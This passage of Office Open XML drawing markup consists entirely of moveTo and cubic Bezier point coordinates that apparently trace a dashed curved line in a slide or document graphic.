                    <a:pt x="41" y="807"/>
                    <a:pt x="42" y="800"/>
                    <a:pt x="44" y="794"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="45" y="792"/>
                    <a:pt x="43" y="790"/>
                    <a:pt x="41" y="789"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="788"/>
                    <a:pt x="37" y="790"/>
                    <a:pt x="36" y="792"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="798"/>
                    <a:pt x="33" y="805"/>
                    <a:pt x="31" y="811"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="813"/>
                    <a:pt x="32" y="816"/>
                    <a:pt x="34" y="816"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="36" y="817"/>
                    <a:pt x="38" y="815"/>
                    <a:pt x="39" y="813"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="813"/>
                    <a:pt x="39" y="813"/>
                    <a:pt x="39" y="813"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="30" y="852"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="846"/>
                    <a:pt x="33" y="839"/>
                    <a:pt x="34" y="833"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="830"/>
                    <a:pt x="33" y="828"/>
                    <a:pt x="31" y="828"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="827"/>
                    <a:pt x="27" y="829"/>
                    <a:pt x="27" y="831"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="837"/>
                    <a:pt x="24" y="844"/>
                    <a:pt x="22" y="850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="853"/>
                    <a:pt x="23" y="855"/>
                    <a:pt x="25" y="855"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="856"/>
                    <a:pt x="30" y="854"/>
                    <a:pt x="30" y="852"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="23" y="891"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="885"/>
                    <a:pt x="25" y="878"/>
                    <a:pt x="26" y="872"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="870"/>
                    <a:pt x="25" y="867"/>
                    <a:pt x="23" y="867"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="21" y="867"/>
                    <a:pt x="19" y="868"/>
                    <a:pt x="18" y="870"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="877"/>
                    <a:pt x="16" y="883"/>
                    <a:pt x="15" y="890"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="892"/>
                    <a:pt x="16" y="894"/>
                    <a:pt x="18" y="895"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="895"/>
                    <a:pt x="22" y="893"/>
                    <a:pt x="23" y="891"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="17" y="931"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="924"/>
                    <a:pt x="19" y="918"/>
                    <a:pt x="20" y="911"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="909"/>
                    <a:pt x="18" y="907"/>
                    <a:pt x="16" y="906"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="906"/>
                    <a:pt x="12" y="908"/>
                    <a:pt x="12" y="910"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="916"/>
                    <a:pt x="10" y="923"/>
                    <a:pt x="9" y="930"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="932"/>
                    <a:pt x="10" y="934"/>
                    <a:pt x="12" y="934"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="935"/>
                    <a:pt x="17" y="933"/>
                    <a:pt x="17" y="931"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="12" y="970"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="964"/>
                    <a:pt x="14" y="957"/>
                    <a:pt x="14" y="951"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="948"/>
                    <a:pt x="13" y="946"/>
                    <a:pt x="11" y="946"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="946"/>
                    <a:pt x="7" y="948"/>
                    <a:pt x="6" y="950"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="956"/>
                    <a:pt x="5" y="963"/>
                    <a:pt x="4" y="970"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="972"/>
                    <a:pt x="6" y="974"/>
                    <a:pt x="8" y="974"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="974"/>
                    <a:pt x="12" y="973"/>
                    <a:pt x="12" y="970"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="9" y="1010"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="1004"/>
                    <a:pt x="10" y="997"/>
                    <a:pt x="11" y="990"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="988"/>
                    <a:pt x="9" y="986"/>
                    <a:pt x="7" y="986"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="986"/>
                    <a:pt x="3" y="988"/>
                    <a:pt x="3" y="990"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="996"/>
                    <a:pt x="2" y="1003"/>
                    <a:pt x="1" y="1010"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1012"/>
                    <a:pt x="3" y="1014"/>
                    <a:pt x="5" y="1014"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="1014"/>
                    <a:pt x="9" y="1012"/>
                    <a:pt x="9" y="1010"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="8" y="1050"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1043"/>
                    <a:pt x="8" y="1037"/>
                    <a:pt x="9" y="1030"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="1028"/>
                    <a:pt x="7" y="1026"/>
                    <a:pt x="5" y="1026"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="1026"/>
                    <a:pt x="1" y="1028"/>
                    <a:pt x="1" y="1030"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1037"/>
                    <a:pt x="0" y="1043"/>
                    <a:pt x="0" y="1050"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1052"/>
                    <a:pt x="2" y="1054"/>
                    <a:pt x="4" y="1054"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="1054"/>
                    <a:pt x="8" y="1052"/>
                    <a:pt x="8" y="1050"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="8" y="1090"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1083"/>
                    <a:pt x="8" y="1077"/>
                    <a:pt x="8" y="1070"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1068"/>
                    <a:pt x="6" y="1066"/>
                    <a:pt x="4" y="1066"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="1066"/>
                    <a:pt x="0" y="1068"/>
                    <a:pt x="0" y="1070"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1077"/>
                    <a:pt x="0" y="1083"/>
                    <a:pt x="0" y="1090"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="1092"/>
                    <a:pt x="2" y="1094"/>
                    <a:pt x="4" y="1094"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="1094"/>
                    <a:pt x="8" y="1092"/>
                    <a:pt x="8" y="1090"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1090"/>
                    <a:pt x="8" y="1090"/>
                    <a:pt x="8" y="1090"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="10" y="1130"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="1123"/>
                    <a:pt x="9" y="1117"/>
                    <a:pt x="9" y="1110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="1108"/>
                    <a:pt x="7" y="1106"/>
                    <a:pt x="4" y="1106"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="1106"/>
                    <a:pt x="1" y="1108"/>
                    <a:pt x="1" y="1110"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="1117"/>
                    <a:pt x="1" y="1124"/>
                    <a:pt x="2" y="1130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="1133"/>
                    <a:pt x="4" y="1134"/>
                    <a:pt x="6" y="1134"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1134"/>
                    <a:pt x="10" y="1132"/>
                    <a:pt x="10" y="1130"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="1130"/>
                    <a:pt x="10" y="1130"/>
                    <a:pt x="10" y="1130"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="13" y="1170"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="1163"/>
                    <a:pt x="11" y="1156"/>
                    <a:pt x="11" y="1150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="1148"/>
                    <a:pt x="9" y="1146"/>
                    <a:pt x="7" y="1146"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="1146"/>
                    <a:pt x="3" y="1148"/>
                    <a:pt x="3" y="1150"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="1157"/>
                    <a:pt x="4" y="1164"/>
                    <a:pt x="5" y="1170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="5" y="1173"/>
                    <a:pt x="7" y="1174"/>
                    <a:pt x="9" y="1174"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="1174"/>
                    <a:pt x="13" y="1172"/>
                    <a:pt x="13" y="1170"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="1170"/>
                    <a:pt x="13" y="1170"/>
                    <a:pt x="13" y="1170"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="17" y="1209"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="1203"/>
                    <a:pt x="15" y="1196"/>
                    <a:pt x="15" y="1189"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="1187"/>
                    <a:pt x="12" y="1186"/>
                    <a:pt x="10" y="1186"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="8" y="1186"/>
                    <a:pt x="6" y="1188"/>
                    <a:pt x="7" y="1190"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="1197"/>
                    <a:pt x="8" y="1204"/>
                    <a:pt x="9" y="1210"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="9" y="1213"/>
                    <a:pt x="11" y="1214"/>
                    <a:pt x="14" y="1214"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="1213"/>
                    <a:pt x="17" y="1211"/>
                    <a:pt x="17" y="1209"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="23" y="1249"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="1242"/>
                    <a:pt x="21" y="1236"/>
                    <a:pt x="20" y="1229"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="1227"/>
                    <a:pt x="17" y="1225"/>
                    <a:pt x="15" y="1226"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="1226"/>
                    <a:pt x="12" y="1228"/>
                    <a:pt x="12" y="1230"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="1237"/>
                    <a:pt x="14" y="1243"/>
                    <a:pt x="15" y="1250"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="1252"/>
                    <a:pt x="18" y="1254"/>
                    <a:pt x="20" y="1253"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="1253"/>
                    <a:pt x="23" y="1251"/>
                    <a:pt x="23" y="1249"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="30" y="1288"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="1281"/>
                    <a:pt x="28" y="1275"/>
                    <a:pt x="27" y="1268"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="1266"/>
                    <a:pt x="24" y="1265"/>
                    <a:pt x="22" y="1265"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="1266"/>
                    <a:pt x="18" y="1268"/>
                    <a:pt x="19" y="1270"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="1276"/>
                    <a:pt x="21" y="1283"/>
                    <a:pt x="23" y="1290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="1292"/>
                    <a:pt x="25" y="1293"/>
                    <a:pt x="27" y="1293"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="1292"/>
                    <a:pt x="31" y="1290"/>
                    <a:pt x="30" y="1288"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="1288"/>
                    <a:pt x="30" y="1288"/>
                    <a:pt x="30" y="1288"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="39" y="1327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="1320"/>
                    <a:pt x="36" y="1314"/>
                    <a:pt x="35" y="1307"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="1305"/>
                    <a:pt x="32" y="1304"/>
                    <a:pt x="30" y="1304"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="1305"/>
                    <a:pt x="26" y="1307"/>
                    <a:pt x="27" y="1309"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="28" y="1316"/>
                    <a:pt x="30" y="1322"/>
                    <a:pt x="32" y="1329"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="1331"/>
                    <a:pt x="34" y="1332"/>
                    <a:pt x="36" y="1332"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="39" y="1331"/>
                    <a:pt x="40" y="1329"/>
                    <a:pt x="39" y="1327"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="50" y="1365"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="1359"/>
                    <a:pt x="46" y="1353"/>
                    <a:pt x="44" y="1346"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="44" y="1344"/>
                    <a:pt x="42" y="1343"/>
                    <a:pt x="39" y="1343"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="37" y="1344"/>
                    <a:pt x="36" y="1346"/>
                    <a:pt x="37" y="1348"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="38" y="1355"/>
                    <a:pt x="40" y="1361"/>
                    <a:pt x="42" y="1368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="1370"/>
                    <a:pt x="45" y="1371"/>
                    <a:pt x="47" y="1370"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="49" y="1370"/>
                    <a:pt x="50" y="1367"/>
                    <a:pt x="50" y="1365"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="62" y="1403"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="1397"/>
                    <a:pt x="57" y="1391"/>
                    <a:pt x="55" y="1384"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="1382"/>
                    <a:pt x="53" y="1381"/>
                    <a:pt x="50" y="1382"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="1382"/>
                    <a:pt x="47" y="1385"/>
                    <a:pt x="48" y="1387"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="50" y="1393"/>
                    <a:pt x="52" y="1400"/>
                    <a:pt x="54" y="1406"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="55" y="1408"/>
                    <a:pt x="57" y="1409"/>
                    <a:pt x="59" y="1409"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="1408"/>
                    <a:pt x="62" y="1406"/>
                    <a:pt x="62" y="1403"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="75" y="1441"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="73" y="1435"/>
                    <a:pt x="70" y="1429"/>
                    <a:pt x="68" y="1422"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="67" y="1420"/>
                    <a:pt x="65" y="1419"/>
                    <a:pt x="63" y="1420"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="1421"/>
                    <a:pt x="60" y="1423"/>
                    <a:pt x="61" y="1425"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="1431"/>
                    <a:pt x="65" y="1438"/>
                    <a:pt x="67" y="1444"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="68" y="1446"/>
                    <a:pt x="70" y="1447"/>
                    <a:pt x="73" y="1446"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="1445"/>
                    <a:pt x="76" y="1443"/>
                    <a:pt x="75" y="1441"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="90" y="1478"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="87" y="1472"/>
                    <a:pt x="84" y="1466"/>
                    <a:pt x="82" y="1460"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="1458"/>
                    <a:pt x="79" y="1457"/>
                    <a:pt x="77" y="1457"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="75" y="1458"/>
                    <a:pt x="74" y="1461"/>
                    <a:pt x="75" y="1463"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="77" y="1469"/>
                    <a:pt x="80" y="1475"/>
                    <a:pt x="82" y="1481"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="83" y="1483"/>
                    <a:pt x="85" y="1484"/>
                    <a:pt x="87" y="1483"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="89" y="1482"/>
                    <a:pt x="90" y="1480"/>
                    <a:pt x="90" y="1478"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="106" y="1514"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="103" y="1508"/>
                    <a:pt x="100" y="1502"/>
                    <a:pt x="97" y="1496"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="96" y="1494"/>
                    <a:pt x="94" y="1493"/>
                    <a:pt x="92" y="1494"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="90" y="1495"/>
                    <a:pt x="89" y="1498"/>
                    <a:pt x="90" y="1500"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="93" y="1506"/>
                    <a:pt x="95" y="1512"/>
                    <a:pt x="98" y="1518"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="99" y="1520"/>
                    <a:pt x="102" y="1521"/>
                    <a:pt x="104" y="1520"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="106" y="1519"/>
                    <a:pt x="106" y="1516"/>
                    <a:pt x="106" y="1514"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="123" y="1550"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="120" y="1544"/>
                    <a:pt x="117" y="1538"/>
                    <a:pt x="114" y="1532"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="113" y="1530"/>
                    <a:pt x="111" y="1530"/>
                    <a:pt x="109" y="1531"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="107" y="1532"/>
                    <a:pt x="106" y="1534"/>
                    <a:pt x="107" y="1536"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="110" y="1542"/>
                    <a:pt x="113" y="1548"/>
                    <a:pt x="116" y="1554"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="117" y="1556"/>
                    <a:pt x="119" y="1557"/>
                    <a:pt x="121" y="1556"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="1555"/>
                    <a:pt x="124" y="1552"/>
                    <a:pt x="123" y="1550"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="1550"/>
                    <a:pt x="123" y="1550"/>
                    <a:pt x="123" y="1550"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="142" y="1585"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="138" y="1580"/>
                    <a:pt x="135" y="1574"/>
                    <a:pt x="132" y="1568"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="131" y="1566"/>
                    <a:pt x="129" y="1565"/>
                    <a:pt x="127" y="1566"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="125" y="1567"/>
                    <a:pt x="124" y="1570"/>
                    <a:pt x="125" y="1572"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="128" y="1578"/>
                    <a:pt x="131" y="1583"/>
                    <a:pt x="135" y="1589"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="136" y="1591"/>
                    <a:pt x="138" y="1592"/>
                    <a:pt x="140" y="1591"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="142" y="1590"/>
                    <a:pt x="143" y="1587"/>
                    <a:pt x="142" y="1585"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="162" y="1620"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="1614"/>
                    <a:pt x="155" y="1608"/>
                    <a:pt x="152" y="1603"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="1601"/>
                    <a:pt x="148" y="1600"/>
                    <a:pt x="146" y="1601"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="1602"/>
                    <a:pt x="144" y="1605"/>
                    <a:pt x="145" y="1607"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="148" y="1612"/>
                    <a:pt x="151" y="1618"/>
                    <a:pt x="155" y="1624"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="156" y="1626"/>
                    <a:pt x="159" y="1626"/>
                    <a:pt x="160" y="1625"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="1624"/>
                    <a:pt x="163" y="1622"/>
                    <a:pt x="162" y="1620"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="183" y="1653"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="1648"/>
                    <a:pt x="176" y="1642"/>
                    <a:pt x="172" y="1637"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="1635"/>
                    <a:pt x="169" y="1634"/>
                    <a:pt x="167" y="1635"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="165" y="1637"/>
                    <a:pt x="164" y="1639"/>
                    <a:pt x="165" y="1641"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="169" y="1647"/>
                    <a:pt x="173" y="1652"/>
                    <a:pt x="176" y="1658"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="1660"/>
                    <a:pt x="180" y="1660"/>
                    <a:pt x="182" y="1659"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="184" y="1658"/>
                    <a:pt x="184" y="1655"/>
                    <a:pt x="183" y="1653"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="183" y="1653"/>
                    <a:pt x="183" y="1653"/>
                    <a:pt x="183" y="1653"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="206" y="1686"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="202" y="1681"/>
                    <a:pt x="198" y="1675"/>
                    <a:pt x="194" y="1670"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="1668"/>
                    <a:pt x="190" y="1668"/>
                    <a:pt x="189" y="1669"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187" y="1670"/>
                    <a:pt x="186" y="1673"/>
                    <a:pt x="188" y="1674"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="1680"/>
                    <a:pt x="195" y="1685"/>
                    <a:pt x="199" y="1691"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="200" y="1693"/>
                    <a:pt x="203" y="1693"/>
                    <a:pt x="205" y="1692"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="1691"/>
                    <a:pt x="207" y="1688"/>
                    <a:pt x="206" y="1686"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="229" y="1718"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="225" y="1713"/>
                    <a:pt x="221" y="1708"/>
                    <a:pt x="217" y="1702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="216" y="1701"/>
                    <a:pt x="214" y="1700"/>
                    <a:pt x="212" y="1701"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="210" y="1703"/>
                    <a:pt x="210" y="1705"/>
                    <a:pt x="211" y="1707"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="215" y="1712"/>
                    <a:pt x="219" y="1718"/>
                    <a:pt x="223" y="1723"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="1725"/>
                    <a:pt x="227" y="1725"/>
                    <a:pt x="229" y="1724"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="230" y="1722"/>
                    <a:pt x="231" y="1720"/>
                    <a:pt x="229" y="1718"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="254" y="1749"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="1744"/>
                    <a:pt x="246" y="1739"/>
                    <a:pt x="242" y="1734"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="1732"/>
                    <a:pt x="238" y="1732"/>
                    <a:pt x="236" y="1733"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="234" y="1735"/>
                    <a:pt x="234" y="1737"/>
                    <a:pt x="236" y="1739"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="240" y="1744"/>
                    <a:pt x="244" y="1749"/>
                    <a:pt x="248" y="1754"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="250" y="1756"/>
                    <a:pt x="252" y="1756"/>
                    <a:pt x="254" y="1755"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="256" y="1753"/>
                    <a:pt x="256" y="1751"/>
                    <a:pt x="254" y="1749"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="254" y="1749"/>
                    <a:pt x="254" y="1749"/>
                    <a:pt x="254" y="1749"/>
                  </a:cubicBezTo>
                  <a:moveTo>
                    <a:pt x="281" y="1779"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="276" y="1774"/>
                    <a:pt x="272" y="1769"/>
                    <a:pt x="267" y="1764"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
